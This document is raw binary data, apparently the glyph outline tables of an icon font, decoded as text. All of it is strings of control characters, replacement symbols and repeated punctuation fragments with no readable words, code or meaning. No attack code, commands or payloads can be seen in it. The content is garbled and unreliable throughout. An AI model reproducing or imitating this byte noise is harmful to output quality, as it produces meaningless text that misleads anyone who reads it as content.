5		��&����""P		���}5���gn~���&'&2#54&#"#"=3276&'&'&'5&?76767#"&'&=7>32#=&"26=#53>'#733'##'##733737#"=3326&'&'.7632#54#""'5326=3#'##53'3�JHtx���	
	"'EHJHtx���#

&DE�00p,
+d

&	!	

	aFw'(�&5				
	 D& 8

,
4	 Bm^^jj\\\\jOOj

	

				SSSiTTiQQ�VFLQ!	##'"'#7#"'76764'&'&'.567>312&'&'&73532'#32427��y�6Y
"2<4/-3="6+ JUVbGDAD4�� #
V���^--=
!"
;	 ���4718�OO b�i�R'\���%#"'&'&7#34#1#1327>70150#%7#7#7#7676&'6'.'&'&'&'6&'&>7&'&'&'6767>76767###'35'.&676&&'&'&6&126=;>4&"&/6?54&"32767>7264&'#&&'676&7'%'&'76&�)�NRW�pk@AA(*B?mp�_VT�'�l
			
%L	
4.494& /)%^x2LB;	
;
u%)/ &494/4
L&

	
'g(
<<BK28/:K<{T�

�U{<FpSt#-.
&!



./$7


!

-(<uSp��"j''k!}HnA@kpq:�K�pm?B#!|R�TSTS:45+'Se;#-)N	"&>6.(
::


���(.6>&"	N)-#<dR(+63:STST	E

:�+?#LL#?'F
,	'"
#

#	,(F'��&<
	;%�j�RIV#"&'7&54>2327654'&'.'.54632".547&#"7"2>4.�
Uzw�02:2!AbF0.&#�),<�sNO@12:2
 8FVLZ\e@$�"9""9D9""9)
R��22/J*(A&'%DHM(f�!6*22>1,@''CQ-(*02�"9C9""9D9!��1W&'&"2?6&'#/&76'676'676'67665677?kMe`he�DS!&�;��t��/����9��#D�e'"/_�)2	��5
���T,)OI`hu�t��x��s��z=J��03:��
�7�
�����(�[�35��

�>��#'3@LV}53254&/&'&54632&#"#"73#353#3#335373#5#'353#3#335353#'753254'&/&'&546323&#"#"
"k**QkC::E"7&'5(-,�mD;;F1506�	"	
���"#�aa�lnnl�#$�ff�gg		
	������8i&'&/&'&767&'&3>.'.'#&767%>&%2767&'&#'.767676776767>�3{w
(G&�	(
nr#!#
��lB:=9bYcc�,	
%J2&!8T#
-\(2$ R �R-L[	!	=!"5+ �
/#9 �+: iF/"@ �	=1

R)/+����IVc"'&'&=&'"&'&='&'&/&'&76765476;276767>2>4."!2>4."�*;!#c%
4L'- .
I-GA& "!�)-&.��33<33��33<33�&	�*#��
	+�	+
	"2<33<32<33<3���c�Y"J%.'&'&'&7?5&'7767676'&.01&'&7>lM034�&)�	A&B4LL	rn1��	A&^D"
686?-"(,9\,-^&)�
/$=@NWZ$	A&�j&)!�?>,o�&)
DK$,	#7-

+FId*Y	A���|�Rh�%&'&'&'&'&6?67676&'&&76?4'.'&#"'#&767676676767676''&"'&&'&'.'&'67676&'&/&'&>6&/&7>7676?6#�
@0+"
!


aH�q*	
	#%
)*0A	
0R%.<WR "D!1
dRDwDUc3H51#.		
E(=~i 
	&	?$17d*%?	#
	
':!GY(z.B0L$	

 	B).


%
?	
	
	<32?
	,(B+2		56(-,(>	<307J%=H+0���g�S*N$&'&7676766&'&767676&'767676&'&'&�g^[�$&GDqv���@DEDpt�(+'�cN!"(*1<eK�r4#&(<AOW_hT�32'7=-1!.)6.5R)(�\`h�qn@A�rx��qn@A�&8YGT#<'Ad%��,D@C04<l�7V"
!��[l|� +&33'&/&+"32##";6'54&+'&'&=&7;25&547>76;2=&74&#"7676'&'&'&767632'&/&'.676;2=4*/&'&'&'&'&#";276?27>&%<#"'";2&/&>326'56&+"3+&;22=4+"=4?6?676736� ?	$!Ye	N(��",// %	/: 
&
�"

	&E

! B5 u	8		@*



�L*(_
N]:
(1&
	/@
& 2
9
?
	&>

!	6(
$
�1")<557;5#&"'&'37373&"&'37!67654.#".#"R
K*D*@*f?
�<!7!;^7(H�,�,Q���#J��S��Z��\ ��# 2!8!
4W2�-AS^ht������"#65#3532656&"'546327%4627&#"#"'32654'&'&'&676?67654'&'#7.'6'&67654'%#65#3547&535#5#33275"&%676764'&%&'&"165#354632356&3#7"264&�"$,|��! $	
!&	
�-260)


	%
�
("6#$
L7�8D^XI��&O&�
�r
�;($!u*+2X
 
	�/0

5E:�,=7$#*&�()+&@E"
�7=]A3,J
o9�1.3	�)u4)<�
�A
W_���b�R��%.>&'.'.'&'&'&'&'&7676'&'36?676763&'.'&'&'&'&'&'&'&6766'&'.'&'&7676?67676'&'&'&'&'&'&776.>c
6868�-'%1!+%:$&		
"#'
	)	

4v*(Q*


	P,

@*1	


$	
&"	
,9
==D�;XXD;WXE7!":B";�O-;	),E;-#
+"+6&
&6&-	 -) 
4'4(-8S8(	$4<L
				
,!*.
 #2NI�(-�2bHGdbHH���j�W��ET�����%051'&/&'&'"/76765'&'&'&?6/7676?'73>767676?>72#?6767&'676765767>/&767#&'.?676?63?674?4767676'&/&'&7676/&7676?6?3&767676'&'&7676'&'&'&76?37&76?676/&'&?67>7627676'&/&'&76767676'.'.76?676/267>76/&676?676'&'.767>76/776/&'&'&76?2767'.?6767'&'&62767'&/&'&/.?6&/&76?6&/722?676&'&'&'&'7>67'&'&5&7476?&/&'&'#&5&'67>565"#%'&'767676'&?767626'&'&67#"7>76"'&547>7665654'4'&#&"&7676"'&#&&6767&'&&'&/66'&'&'2767676&/&'&'732676?3767676?3>763"&'&/67676767676&'&%372?5&'&"67#'7'&'�


2D{r�|i�B!
!-	


		



"$	

!		
		



	

	*
  (
	
	 *			(	
."
	



		
5>


	


.+	




 
	
0


"
	
	A			
�J%&
	"	
�
�/		07	
 )-

o	1(1.]^	

&!
	
	$
	!
	
g(1%'
$'/*��
K 
	O
��	 hXsHD>S�KY
	



	
	
		


 5%;94#/(+#	
		
%#
+

%'%,7# 
:@3)81
  
<1
-, !&9
'4
#0&9>;


&$ (
			" 
!$

!M>2K	 ('-
	.2
&'KB	8:4***"'	
"$"	

	
82+7'IC*$ 				


�3
%"!-	
6	+D	

L
y

-#
	


"3		
�:
'<

	�	��A	
��#?#"&46;5#";2+3264&733535!35#";5#"'&'&47676��

��#12"���(77My5x��Ϭ�((���52E2"57O7?��566
&z&
5
J
��/@M_"&462#"&'%#".4>32>?54>2%.#"327'.>%2>4."4&#"/326�6L77L6%p(D(4Q��#,#<##<#.G
5(-LZM-?�++&66&+:#<F<"#;F<#:)7:;	4!):�&66L77�`	(C(A1^#<F<#9+[y-M--M-5VI5L5949#;##;F;##;��)9
:3'9�o�M2%&'&'&'&6767676?#676%3']Gf.7/4*,�<H>E7:)&��2Gfp�;I=E7:)&kZ0B
��?7/( 
�
$0B)X?7/( 
�N
�i[R$%&'&'7676.>32[	$@K"i&27$+�Y5O?"":"�&%''VF7L5+%�i�RKZi"'./&='466?6&#%"?>76#?72736&6'4&#&+37>%"735#"�	3+�8����
	rZ 

	 
	
��		�?-Y-;M'�'O<,Xc.3
�E�
�B$<�]	8h�
 ����&: "54h��NN��e�RC'.?6767676'5#'&'&'.76?7276?6'&'&[=r;
4B %<)
3;1>%JB!Mn7\H#
6F*U
s`�UO�P(	
O9
<0a�MkIb�j}R!.6>AW]{��%276764'&'&"2".4>2>4."#335373733'771654&+35323&5&'#5323#"'&476323.#"32735#35#535#35#733535�j[X4554X[�ZX4554XZjGwFFw�wFGwF$>$$>H=$$=�v+ +(6 6
!6#�M
 1##w 
		
# '&!<qEELklM[+ +H54XZ�ZX4554XZ�ZX45�Fw�wFFw�wF�v$>H=$$=H>$��uu�  �X44
�8
((
)
+A*N�uuu���l�T%6?&67654'&'&&'&47>"32>4'..46qk^Z6822WYҷ6931UWu.RS^R0S�
*I*("&.*H*H) $/#"P32XY�\Y68eX\ogYW46��.(*h+'.0R14+(-q*I+'H*HW%$(�#0##/$�X33353!!#!5!5����M����X���M�����������-[454&'&'&'&6767676676767676"&'&'&'&'&
)0 :/5<H:gr(10	#<OT&2!$&-&<!	.b+/+]+& �4"I$$!
=7`'F

,Q(4
)			'npFH3"%::4VAP.+�f�T:Piu�&'76767676'&'&'676?67'&#&/&'&'&'767676?6776767676&'.676%376?676767676&'&'&'&,
��[EXQ/B:LK[dP)< 

��u�]Fw��7	0
&'|{n+.:87=-.%-6/((	n@B$?J?Q�[m
(/m$.#��3'*:8E=H9&!*2:0=�$��G$
+53!18/0
�C)-
*.BAFI*��$<"!2+=
q�(

**79Q++/G6BC	
{�����)=`67636&'&'&/&&''&'.#&'&'67676376%/&'&'&#&'&/676762� ��(!( $ '0
8%/&"+Xf34	
,8`HT��0
 |������&
	:�a��@+�K�

;

 	(	��)6Ke����5#'3#"'.547>567>'&%37;5#55#326&5'3353;5?25#73653.5?65#3?62;57+75765#52='76&'.+;26&546326/&'+5432&572=#5325'#';5|$%	"
"
��
'�F
5!1
	�::0#
3/
	!
|
$;
'#
12
 0O#&
: 
89�@,�%��5(,,--l+@!y
(,\)
�
#%3		'�5��4<&+3532354'%+6=#+5#326?32?6=33535#�&�[
		[�		
+[ 	[�"
W&2�=[<���		Zf$KZ		fZ
	��

92&f[��[��8Vksw�����&+&'&47>2354&'#"#2+"'&=#654&'1#31276765'&'&'&''1'&5'74616'33535#!3#%#3733'7'2167676#32674&'32+#532'#5#35335#�
	(
		

		($.0
�		  

�.,,�{**><.,1,\|	/QMH	
�0++0**i
!

		&"H
(!!
\		%pp%���>33
,�(
8<7�99�����;Zr���'&'&'&'&767676#3'&/&'&5'4#&'&'&'&636767676'&'&/"'2767676767'#735767676'&'&'&'"67665&'&'&'&��yZ;73%GTlge�xJ131(ITjP��.,pSCL%	.@+
�4_MA *,	6Z�


#$G%?#DG �
QF(=�	
	_�1&97>ZS=/6;%57=TP@-5�%'JJ7_	Lp"#
�b0)5CF4,
50:7*�cM0"

).4<�+5+:
	
"
8.:�5%00?��1ADTd"'654&#"'54&".#"327326?3264&%45?3275.#"&4>27>54&'327�3)
�)8*�+'77'�)E)6T
�,'77�	�)/P.�>$%>J>%1��+4"R(6e`)
N))
C7L8�$)F(F5Z7N7yW3R1.  "L?%%?%+F QW3*I&]�i�S'Yht��'&'&76?2674767667676'&'&'&'&76?67&/.?6&3&''&7&6"32>4.%2674.""2>4.?&@CT*"O
EJ%B# *
��
	+0G(#	=* 3Pt�dLLQ��)/�%*::(.-�(8-5/:...2-.W	0)@!%	�F
*7/4,"�7H<.C,
q$94/#8G)41&"��?��s3'+d M@K<�:R9.5-�9(/.+9��-4--6-?�X�W.Xdr{|�����%1�����&0JW�����Fy����->���&/KY������,NY 2lt��6376276'&'&'&/.'&76'&'&'&6&76327&'&767&'&'&76&6/&'&6656'&'"767&&'7>75&676/4'&/&67676&'&#"6?676'&'4'&'&'&#137>'&77276'&'&'&76&'#&&'&5476'&"'&/7>'7676""747676&67&'&/&'&66''"'&76767.''&5476'"&"7>'&'&/&'&7'7676&767#6'4'&'&7254&#"654'7676'&""67676?676/&'&76732"6'4&7&364&2674''7623>'#"'.67.'"776&/&7>?67676'.'&'&'47>767&'&#&76'&/&/.676?>'27&'&%."723>&5&767&'&/46&727&76?6?676'&7>76'&6'"&=&74'>'4&5&766&'.6&'&676&'.#'&7>#"'.'766&3676&'&/&'#"'&76'&'&76?>'&7676&>5&7>.'&'&&/&'&'767.'76766?67676&&56327'&3676'.'.574>&67676/&'&'&76'&74654'"'&'&'&'&'4/>67565&'&>'&"&76&'&'676'5>71"&'&'&&36736?>?6?>17>5&"&'&677'&676'&%7&'&/0'7676'&'&'6&'547676766'&/&'&'&676676'.'66&>56'&/&'&'&737>'.'&'&'&+.3265&'.327676765&'&.563.627676676762&'476.'&7"'&6&'&.76'&>&>'&'"32?>6?>26?67>76'.'.6236'&/&'&76?>5#"'".'"&"&'&'&'&'&'.'&4654&'67676&/"'&76?6.'1&&'&'&'76&&'&'&'.'767765&/&67636'&&767&?67676&?6767I8#%	8
J%
	

&d		��
	�

	
V

	-		f$'$*#8	

%*		
	
	{
, 
�	


		

��




	��
��

#



^	

	#	
		


	

	
	2	�5*
	
 ?				&	



	
�%'
	

,%7	E($�	
	#�#	'	
	:.%@#$M
	#FH '/
:$#	:�%(*:"
'
	�		
:O#Y

)="		
	"	
{

 1


-	


	!#"		6	
		��P
3$&9&&	
+		
�0	
'6		$
86# 

	
�N




!
	
	

		�

-(

��-		5				 "



	

			
		,
	r



	
	�3�	
$';			M
."	
�U

#E
P�-
	
	<7	
	!			V;	
	
	

G�\	
	
	
	
		
L

&#&6!#	5	
) �	

	6
	3		y		
(�

�		 	�		}
		
	

	
�
X*
�s= 
			
		0

9@

&F
�?
'%6 '%+����	
	
	
'
4G=	/_	


	
&

!
.%!
G
�	J0J#,

	%	"	�
		7��"
	

		'/, �

�
��$+
*&0
N@$

!	
��	4	
�
�O	



	$	7.




� /%
"�
	

5	
)'
				

"			l

;		
	
2	

		
��IV_py"'&'&'&'&'.'./&'&'&'&37676?67>6=6&%"2>4."&462'&";25'476'"264&Q9

1="

(! 56>55 +,;+*�#��

#"
&*
$
  �6?56?5�+<++<+���\
��*23AQVd~���5#35&6765&'14'.167#'&'5676'3'#37#&6?#62335#'135%.'&#37"&'&15#3547>354%135.676&"'&76716\*-

<
90+
�g.	!	.2�y,B|Gm,
"Dk

+,		,�,$%35


y	�E	&T%

#	8%]`�)!#J!#m��H1+H�e	�P
WS[((C	" DG


�j�r>Wg�&'&'&7676767676'&=&'&'&'&/&'&76763"'&'&676'&'5.&'&'.>32$&>3267>�-2V��Nb&�	
V,
���$(�>BpC5"
	


FV;"

8
'��o
0*'[# !0,>OZ7;A?eN���2

9s^.
&&��&FuE

A/2 	d
]A@?q
9+��y%<*+5"R)(
6���k�E9>76.'&'&547676'&'&'&7>7676�>V�V	1hE>zZT@
e
_DC<97�h�{xUWiOScGDG#
h�UK�\%Z>Bz]	
f#,ON�dhYWt((Z\|`b_�7:���g�R 5\hptx&'&'&/#76767676="'&'&476762&'&'#""'4/7676;276>76'.'>437'&�Vm�.4D?z�20�hFH��}&	�ueb9;;9bd�db9;;9be�$',V<�6$9p&_<�8'?
�8��(M>s�b`eb^cb��s�++�FDk_^�qj�(3�C;9be�db9;;9bd�eb9;�,]�#0y�b1�l� _392F�C!���g.��G����o�M$1=I"2674&'&>&7>."265.'&>&%?64.�(#(��,�
B�-�	�(9(��	�,���,�
M�����
2/
mEm
01
����n�
10xm
01
��h�SC|����4&/&'./.'&'&'&/./&7676765&'&'&'&'&'4?6?676?>?6?6'&'&'&76767676'767>'&5476767&=%"/&'&75"1'&'&/2?6776&�"
2��A	K
IG�CM dX�5]Pp&(5?qD9	=
#
��
69�)3*9UD/	=$F#
(*3��
	!3

+; /o
+		
./cZڤA)Fv�
*���e!?u�x�"	/	3	$$	3	
7�(LW& &&J,	M#��TD�
,�� ����

��
&
$Ha=	[t 	Z?nM
U/E-��j�R0r#"'&547676 "73276764'&'&&/&'&/.'&7676?6?6'&/&'&'"76367>76�CAos�~o��YGCAos
soAC�p`]79&4�2s>p`^7887^`�E

2M	#BHC!k�rnAB<Vu��rnABBAnr87\`oB?;4�2!#86]`�`]68��"!D1
CH,,$D&+���P�Dkt���'F_x���;b�+���@|��`�		$	-	=	@	�	�	�	�	�	�	�	�	�&/&'&'&'&'&'&'.'&"'&74&'&""76+."'.74/&76?6'&67276?6'146?'&76?6>3'&76=>76'&76?632?>.'&76?67>/.'&'&7676'&/.'&'&?6&'#&&76?"5676766?'&>6767>&76322?6376767674&/.7623276'&/.6276/&'&'&'&7276'"/&76767367>&/&4762"'."'&?>2?6?67676?6'&67>/&/&7>&5>'&?6'76766767&65'6?6767767676?6&>77'&?464'7627>>276?6&'47654'."&4767&'#.&6767&6?6;2"&&76767">36?67&'7>#&%/67>7.&'?676&?6'4'5&763>7/&/.&767677&'.'&'>#"&"'&'&'&776&#"'&6736#;&4&6=2627'#7676&67676%?67632+"7273676764'.76?63276767>'&547>'&'.&'&'&5"&7>&#&'&77676&#6764'674&4.'67&5476'&?6573267676?>'&6?676236&"##'&76767>'&"&?6'#'&76'&'"76#"&'&'&'&'&';26/&/&'&=4&'&'&'&'66'&776376'.'&+'&76/&'&&/&'26/&'5&672&'&7546276&'&"&'&756&'&'.76#"'.2/&7654&54&/&'54'&'%6?6'&6?6%6&6&/&"&'&/.&'.7636&'&'&'23.&632&'&&76'.'#&?632?>.'&676?67&546766..5&76&.76&6767'>&/&6&#"'>762263'&/.7676&'&?67632767>/&4676763>'&/.'&542365&'&/&1"&76&#"77676'&'676736>'67>'67&/&'&67676.'&6?676#&#'"?676676?>'&4767676676'&".76"75.'&4?>?6?667676'&'&'&76767276.1"'&>?6&'&/&76367/.>7'&'&76376'&271676'.'&#+&74#&'26;2?674&6326=4#.6764/&5&767676'&/.&'5&7>>76'56'.7>'&'&'46767676'>'&'&&"&6'.&7>'1#7676#?6?6767>'&76?676'&'&'74&&/4?>'&47&'767&637476"#>'5.'0#"37624"'273264&&#7%6&�v

	
(	

$		
		
 
	

	

	
	9;	 	



.$
	
	



	

	
$2
	



			
		

	
	
	
1	
%		��_	8w+ 


N#	


	
	(
	
	9�


	
�
	

8		�" 	
			
'


 ,	

 
0
,=�		+(�
1	/9



*'7

	
#D
(12
#	




$,		
	
			#�&p_
�


o�		K. 		&
	57$
30+GB#			�
0
$<


		
			


x

	
	&-#7-
'
!


.			&	
��?3

		
	
(/(7


'
	 		#	6	�f

	


	




		L		
	


	
		$
T'
	
		��
��
���			
	
				




			
	



#

	

 

			


		


/
	
		
		

	







			
			
	bq


'	
					��
	�

		.


		
	


	


		�		
			��




!N

	/


	
		


	
	$ 	
6


��
			


	




	
#





	
 	
	

66

!,*�8N�
�
d
�	





(	"	

		
M	


	
	



 
		

	
	


:	



	��
	

				#	
	%K
	�
		


2	
LO	!	"
	

	


	
	


8
		

j1(	





&+/#


a	
�


�
	�j�R%
%%
%��i��i������8�w+�v8T�O�&2�(L�������>L%'&'&'&'&545737&'&'&'&=>32>7653'&'6764.�`lOEC()84\<iXB2!6:.AGwO;<mI=@EA94#E))BEN\��E
� >jG>	"G-j�P6G!9"��`@EJ'0eF#��>M�X
�BQ�
#$d�cW���&/��"276764'&'&&'&'&767'&'&'&'&'&23673676/./"776?>/&'&767676767676/�ufb:<=;dg�fb:<=;df� 	��ty&%/y2@B	
	
;U�	m"+19? -(2(


	
*~
<:bf�gd:==;dg�fb:;��
 #0/;5�	!'�U��>
����
%	 

�hr#)03,-$$0*"���3C!+"&54;2+"&54&+"+"&5463!2+"&546;2?k�cc�a*�bq#=#�cc��l�l��*���#=$����jAR "'&'&532>4.+532�[MK--�'ANA'&B'__ZNK----KM�--KM[��e&B''BMB&�.,LM�MK--�o�M�������%"'#.'./7''57'54&'&'&7676756/&/&"'''#&"?>?4?6766?35735762?65/&%'.'&6?7'575'5462/57" 7676'&'&/"'&'".4?&547676?6762'
"��&��$$	��&��!


a�
	*!*%%*!*�a�|<
<&s$&&$%%
�=&<
ƆtpADDApttpADDApt;9Y\�\Z9;*'42WYj
jYX24*�!l#w+w$k&#��
&k#w,x$l
	b#

����

#b&#
	#+YE
��#+#NDApt��tpADDApttpAD�2T1221T+V^l][8:<<:8[]l^V�u�G.AXbt~���!"3!2>=4.###53#5"&=3276753#"'&'#3>32#26=3#"&=462'"354&'"326=4&357##'#276=4&"7462"&52673#"&=#1��2T11T2z2T11T��;9;��3"3
3�33�a
4&&"'*F%J-�		��@KB'*AM�'.H.
�!99
9u1T2�2T11T2�2T1r��%2����
��
Wo  H0
&((&r *&$�

��ݗ��"� ) �#*�	
�

E�
	���f�T/16767676&1#'&'&'&'&'&'&571'#'#4#/&#5/&/#&/&/5767676767#'&'&7676737276767676765#6'&'&'&&75676767676/5#4/4#&'&'&'&'&'&767>1#1""""##/"/&#'"'&'#'#.7>76�<^KC	tv6!X>6C>K=7,'
/a	;YEN+.&&!.c]oL<!
,D:8>B51#1(G"3D?EC92G
>+j. $	 &736'!0$di,9'
!;N
3FZ0_ZaA[K6�'(W(&��&- 	##%�1	2=0UNT*)-"82aA	#)7b_/-+-#c9"/;/9 !%&+'
 0!A/	)%($$%2.;6:,'\yA/[E5D`�ls]	����'3AQ_o%!"3!26=4&26&#&'&"3%2.6254+"32654+"3%2654&+"3#254&+"3!26=4&#!"3!26=4&#!"���[3�|L��|�[[�\[[�Q����::#p9$E=|��=��>��>��>��l�n���� $(,0!7654'%'&#"3!26=43#3#3#3#%27567654'.'&/&'&'.467>3267&/&'5&"#"'&'^,
�j�jS1�&:Y�KKzJJ�UKKzKKq
"
		

		")
"


���	�+*��w��w��w��.!
())#



)	����+9HVft�#";2654&!#";254!#";2654&3#";2654&+";265&!#";2654&+";2654&!#";2654&+";2654&�<<�;;��<<�$$X��B�B��������������������W$2".4>!!4.#52>5!3"�%>%%>J>%%>�pk���!8!!8!0!8!!8!
/Q^Q//Q^Q/�X�?!8!�!8!!8!�!8!����GK[k%2654&+54&+"!54&+"#";#";;26=!;26=32=4+5!5!%"&5463!2#!"3!2654&����������&���v �(����""""��R���s���3?ir26767676'&?4&'"#"'.'&#"#&>276#>#'"&/&'&'&/3%32>76?>&"� +YIPC
OB&$m#->..>N	DXMc*

� �	,!��!,	': �f;'	�w.)!',01 AQ
a-)
P>/>;!,&�	�	#D"**!57
;h6 :##9>�"

 : ����(!"3546;2354&3!265!!"!54&z��@	�@����6�k�A%%A�dC�� YY��<M2>4.";6".544.+"/.?6&/&4?#"3!265�4X33XhX33X5
:%6(%?J?%�,K-}29
:2}-K, " ^;dxd;;dxd;!%>%%>%0�6-K,
{UU{
,K-�  ��:`3".=46367676?2#32676&'.=4."#""/&6?6&+"3!26=4.J�3##4�	.O\N.	g]ZZ]4!�!3�4..4q.O..O.qP	��	4�""�4��:�"&462"&462"&462#";'&56767>'.'&"&/&&/53264&+";;3127676726=312=4.'&'&'5>=32654'6?6=3264&�	N%)/$

(b(

$/)%N

�	KG3+	'1@ED@1'		+3FK	�
7
�
f
$
?				��
$
f

sG




	


Gr
����V^dmv����4."2676%4>2".5>54'&'5232654'&'54&"&'&'&'&"265'&5467#!264&!!2>&#32>&!"3!264&!"3!264&264&#!VH{�zH%#{�|#%�54WhW43XhX3�(/+
		
#+(
)
'3�  ��3P� ��  ��  :  ��  :    ��3�I{HH{�><HH<?H4X33XhW44W^%"%
	B

"#I

�	 	w�<1 - �I$ - -1 - �d . !- � . - C - 2;
���>GV~�����'264&"';2"&4326=4&+/&?6/&?#"264&""&547;2#/&?6/&?#";26=.7264&""&547;2#/.?6/&?#";26=4&%264&"';2"&54#/.?6/&4?#";26=4&'26=!26=!26=4&#!54&"!"�##0""
")�	&&
 "0""0"d"
&&
�
�"2!"1"d"
	''
�
�,""0##"\&&	�
E	





	��

��	

�'8''8'U
 �
2%%2
�i''8''$
Q&&2

2S''8''$
Q&&2		2'8''8'U
Y&&2		2�
	XX	

	XX	

	n	
B		B
	n	
����S`pw��7"&5463!24&#!"3!&/#";26=4&+"&547673264'&+&'&"#"327%4&+32656=4&+37667#%.'#"32>54&##5#53533���&��,
�

+ ^
v��

��	xG_>"%@21@%1R0B;4::4;X�	!���,

 ++!!,�	{
{$72AF%20R1$B�;;4::���,BLW76&#!"3!26!"3!26?6&&#!"!76%463!234.#!"!76&#!"7!74'&#!"�
	�	
�$�M	�
���& ��)$n#%7$5��6)[8
��	B��E
f"


"	H
s��3##�� 56���+4+���
/?���#";265.#";26=4&3#";26=4&7#";2654&&/&676?676/&"/&"/&"/6.6.6.6.'&"777?>7265>7>/764'7'&"2?64"&462�bb�ab�aa�bb��r2	
IF
%
&	%
&	&
%
.J
J.
!
NId#d#=
o��ru����u��rP#	
u

!
HE
%	%%
%	$
%
-I
I,
 
M
Tc#b"+����7DR^���%#"&47673264&#"&'&"#"327+"3!26=4&7#326=4&#326=4&#326=4&#"=4&+"+"3!2>54.%46;2+"5#!"&546;2;2=4;2�
	f	"00����
���=��� 6  6 ~ 7  7�oml�%��%%���%�/%$0	/#
"1� 
~~
�hh 6 �) 6  6 � 6 4l��$%�$55$
���
-=IYi���4+";257#";26=4&#";26=4&3#";26=4&7";2=4#%326=4&+"!326=4&+"!"&5!324&++"&=#+"&=#"3!&54%.'#"32>54&##5#535339\\�]]�\\�]]C\�i


�


���N
 -""�""-!!P�I),L:!"9M+9a9!NF=EE=F�\d\\�]]]]�\\�
r

q

r

q
�!I ;"";;""; ��!�! ;MWL: 9`9+M�EE>EE��?"B�%654'&'&'.7676.'.'&'&762767>676'.'"'5/&'&'467327654'&'&/&'&'&'&547675622'&/-$ 709)%D""D(C8/6#


!(90�/:) 
�"	"			$

%

	4&1VRG<5#
2,'1"	W;[
$4<FPU2)
!	
"!I,(	")(
	

 ����"276765!%4'&'&'&�i[X3553X[�[X45�{�6��18HG�54XZ�ZX3554W[i-OHF6����{8���/?�#";26=4&!26=4&#!"#";26=4&#";26=4&;23!2+"3!26=4&+"&=463!26546;26=4&#!"!"&5463!2������@������x0FF.����=L����%%%%m%%+U��--��T����E����	-;?CG3!265#!"&5!'&+"6?26=2647&'.6?!!!!3#?&�'A ��!곰��
�
���IM>
3HMs���������()C��""�v����	

	��
�'
0FJ:�,+��� BF%.+&'&'&767676'&'&+";3!2656'53>=4!5!�.1@!, 
'@ZJ&0
F
�2
�		E�O�� %)803(PE'=
>MN
 #d>	(�	1

'
j
�#���$4>HR!"3!2654&32+"&46"&4627#!"&5463!254&+"354&+"34&+"�^���RR-�
��


j

��
6

�
6

�
6

��-��j


g


���


��	

	�	
�������76Y�&/&#!"&54632>&/&;23!2?64/&/.3!265&75&%6?6766?67>76765&='&/&/.�&:�C0[		Z+'�	r��		h
D"{Xn�q*{+rRL�*8%~[-
{t
t�b)

Zwm
V,�V$F3&<�7P)�7>6	*T)~
1�Z��� 1DWl%7634&##;265&5474&#'"66'6&#"#2326=4&#'"!23265&474#'"!4&+"3!26=4&g
2&'O�d
00	�22	f�22	33�22	33�V�w��5�D���
	�T	�xw{�/���}�?[%#54&#!"'5325474&'!;!"#";26=4&+5!#"3>5&54+5!#";26=4&�F��h*��i��J	

	�


d%G�*C%h


�	

`��+�D%���
�	

	�

�� @0,W*��
�	

	�

�aPXNW`i%.'&#&*&'&=46;2>.#"'"&'&=476&/&#32>"&46%"&462"&46D<+$Es:&#)�#H(G?MDt;%FH$./)*2[�	[Y,�*+=+,�t++=++�+,=*+)4$$		�A.LR3%$
o&�%	-2-)�"H6>) "U�*=++=,�+=++=,�+=++=*�i�S�%232;2675.#&"#!"&56'4372;2676'.+"#!"&54'46;>=&76.#'#&36#&;267>;2372676'.#&"#&#"&'.'""&=&6g���KK��	��	��	��Y*91 !EZ-&57&V/��NNKK(P<
�0\[		59+(2:(^%.��,����CUg{�#!&546;23!26?>6574&/&2?>32654.';26=4&#"%;2654&/&4&/&;26�
��				
�+�<
+	�+(���8M		9	�	M	D�	M	
&7	N		M	1	
J

��		
0e�Z

B.���4	j9��	��		�C���		�?��A��		�i�S(:L\l|&/&"32'&'&767676;26'4";265;265&54&;265&'&;26=44&#'";25�uu�~	&\_}WY���r�+dPXs�;;q�7;q��<7q�6=q�ff�
%_a'6M���dx�n��4 ���~��	�����j�R-D|%"/&;2654&%/&;2654&%&/&#1";265667>67654#!""/&'&"2?622
3
�
0


F
�IE
	x	�	�a`�!��	#w^,9
	8oP	>�R)
�8
	��w


A	

���
�E��	

	/�i� 	
#�k(4	
<yW
	=
�L'�h�R%M��!"'535#535#535#535#&#*#535#3!56?>6?>''&"%6?>676?>65'4''&/&"06?64'&'&��}::::::::���:@/�	�!B�(v�
�p7#	��
,*VW|?}?|?|?}?�!�G��u�b
&Q(N3w#F�	�^�J&+
���
53f�h�Rb�72654&'73272654&'567253272654&'6?264&"#"&'654&"#"'64&"#""+535#535#535#535#'#535##3!5&75�)J
 ):)4Z
):(,))9)/!<
(:)40):)J
))⺻:::::::
:w�(
�09)) 	O�
Z))	A�1):))
�d<))	�L	H9))
�(9)t|>|>|>{?{?�*
���*	R<P%&/&7>7>=#676?6&.'&767676%76764'&'&/#VipN
2��\*�:[�,W2�Kv
%�M#5�]=C�%n�2
�_�Nl�@��!.LH�r2d7�y�h=(�Z�Xn��I'N,#d������7*8&56&'&#"7>'.767654->'.'&�M$yge8:;9]ao]X
]���\56�IJ	+�Y
D4�
>=gjzo_]79% �	���;_bqR�	Op
�����j�S+��&27676'&'&'&'.767>&'&'&76'./.74'&67676>'.&'.767>77>.'"&4>��urBFCBqt��tqBECAqt��nj?@?=im�mj>@?=il7675j	6/>F)N&A43/ 4&%8(&3�'RCBqt��uqBEDApsvrCE�;?=im�mj>@?>jm�}lj>AQ"(#
<2$$A"+(A),3	+1@;#16$-''
����-<������%676763654'&'.'&/&'"363264'&/7267656.4&>'=675%";272#''&32326'23&"&67676&&+5#&463276237632367543672?6'&'5&7674372=4#'"5&'&7676/.'&'"5'4+"#'#'"72.467"37225743236765'&367632576/"56'43765'4#5'&576#'&/&#&"&/"##'&7"&46A%N'A5%�%	\'2!)
'O<	.T-M*L[M.+L����}B�	o70_W+H:~	2J%L�r9
<��
s	 
v	
4C
		

+V		
�") ��
	'M4/+$&/,M0,K[O.l
9�V

�H��
	
	��
-



A



	
��dct���*Rf���&/&'&'&#""&'.3'&'.7>'&76'&"6?67>3!6276'&'.76>%'&#&767>'&76&2;27654&"'&'5&'.=476..756+"&75&75"&75'"+"7>76&636265<'4'.'&&/..#!"!'&;66'5&'&##"464'&76?>736.'#&76'6'565354'&%6767>/&'&'&'&.+&?7273>/&&#&6326/.#Y	#

�m"#
"






&
	N

$


%$��

#�8&
�I��%				"		,WzT41O	�9A#+Y�A		��	�/'OO(		
Z
7(	U
g		�	Y-

62 X+!
>fJ&	&	
		6l6		
4i-	
	2�&KQ
	Kj�	�
9t8
+%:
	(kg-"
+7,	
2>F2	�9	D	(*	��I			|�	�
3Hax!0(
�	! �H#��(:NYb!"3!2656&'&7&?476?6;#&#'676?633%+'767>5##!5#"5!5##!5#�����	.�1b!6+X$F,V2cXGS*	��
